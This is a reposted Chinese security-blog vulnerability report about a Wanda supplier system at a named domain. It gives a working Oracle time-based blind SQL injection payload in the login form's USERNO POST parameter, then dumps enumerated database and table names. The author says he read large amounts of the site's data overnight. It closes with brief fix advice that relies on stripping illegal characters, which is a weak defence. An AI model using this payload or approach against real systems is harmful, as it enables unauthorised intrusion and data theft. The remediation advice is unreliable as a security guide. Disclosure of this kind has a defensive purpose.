记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

万达某系统再次注射

2013-05-09 15:55
问题系统:供应商系统 http://www.vans-china.cn
 
 
 
修复不完全,绕过登录被修复了,post修复不完全,从URL注射变成了盲注,得到N多数据。
 
 
 
post参数,USERNO。post包如下:
 
 
 
USERNO=1111' AND 2704=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(71)||
 
CHR(79)||CHR(66),5) AND 'vVvu'='vVvu&PWD=1111&imageField.x=27&imageField.y=9
 
---
 
 


 
得到数据如下:
 
 
available databases [7]:
[*] "SYS"
[*] "SCMUSER"
[*] "SYSTEM"
[*] DBSNMP
[*] OUTLN
[*] WMSYS
[*] YSMSYS
 
当前数据库是SCMUSER
 
 
Database: SCMUSER
[93 tables]
+----------------------------+
| "EXPLAIN_OBJECT"           |
| ADVISE_MQT                 |
| ADVISE_PARTITION           |
| ADVISE_TABLE               |
| ADVISE_WORKLOAD            |
| ADVISG_INDEX               |
| ADVISG_INSTANCE            |
| DU_DUUSER                  |
| DU_LOG                     |
| DU_LOGERROR                |
| DU_TXTLINE                 |
| DU_TXTSQL                  |
| ERRLOG                     |
| ERRLOIN_ARGUMENT           |
| EXPLAIN_DIAGNOSTIC         |
| EXPLAIN_DIAGNOSTIC_DETA    |
| EXPLAIN_INSTANCE           |
| EXPLAIN_OPERATOR           |
| EXPLAIN_PREDICATE          |
| EXPLAIN_STATEMENa          |
| EXPLAIN_STREAM             |
| INF_CONTINF                |
| INF_GOODS                  |
| INF_GOODSCAT               |
| INF_SHOP                   |
| INF_SUPINFO                |
| PBCATCOL                   |
| PBCATEDT                   |
| PBCATFMT                   |
| PBCATTBL                   |
| PBCATVLD                   |
| SCM_SUPMKT                 |
| SYS_AL                     |
| SYS_AOGEVENT               |
| SYS_MESSAGE                |
| SYS_MSGTYPE                |
| SYS_OENU                   |
| SYS_RLMEU                  |
| SYS_ROLE                   |
| SYS_ROLE1                  |
| SYS_ROLE2                  |
| SYS_ROLE3                  |
| SYS_SCMUSER                |
| SYS_SCMUSER_BAK            |
| SYS_SCMUSER_ERR_BAK        |
| SYS_SCMUSER_WQBAK          |
| SYS_SHOPGROUP              |
| SYS_SUPPARA                |
| SYS_SURL                   |
| SYS_SURL_ERR_BAK           |
| SYS_SURL_WH                |
| SYS_TEMP_FBT               |
| SYS_USERSHOP               |
| T20080418_102524           |
| T20080418_102524_EXCEPTION |
| YW_BADJUSTDET              |
| YW_BADJUSTHEAD             |
| YW_BINSTRDETAIL            |
| YW_BINSTRHEAD              |
| YW_BORDERDET               |
| YW_BORDERHEAD              |
| YW_BSETSCHARGE             |
| YW_BSETSDET                |
| YW_BSETSHEAD               |
| YW_BSETTLECHARGE           |
| YW_BSETTLEDET              |
| YW_BSETTLEHEAD             |
| YW_BTCDDET                 |
| YW_BTCDHEAD                |
| YW_GOODSSALE               |
| YW_GOODSSALE_20110711      |
| YW_GOODSSALE_20110808      |
| YW_GOODSSALE_20110810      |
| YW_GOODSSALE_20110811      |
| YW_GOODSSALE_20110819      |
| YW_GOODSSALE_20110901      |
| YW_GOODSSALE_20110911      |
| YW_GOODSSALE_20110916      |
| YW_GOODSSALE_20110917      |
| YW_GOODSSALE_20110919      |
| YW_GOODSSALE_20111002      |
| YW_GOODSSALE_20111004      |
| YW_GOODSSALE_20111008      |
| YW_GOODSSALE_20111014      |
| YW_GOODSSALE_20111025      |
| YW_GOODSSALE_20111028      |
| YW_GOODSSALE_20111029      |
| YW_GOODSSALE_20111108      |
| YW_GOODSSALE_20111109      |
| YW_GOODSSALE_20111110      |
| YW_GOODSSTOCKS_BAK         |
| YW_POPINFO                 |
| YW_ZRSTOCK                 |
+----------------------------+
 
 
 
无数多数据读了我一晚上。
 
好吧,没什么好说的了。 
修复方案:

1:修复要完全啊大哥。
 
2:get到的参数,在经数据库比对前,需要将参数中的非法字符replace成空,这里USERNO和password都存在注射。
 
3:说好的电影卡呢? 
 

知识来源: www.2cto.com/Article/201305/209333.html

阅读:100033 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“万达某系统再次注射”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云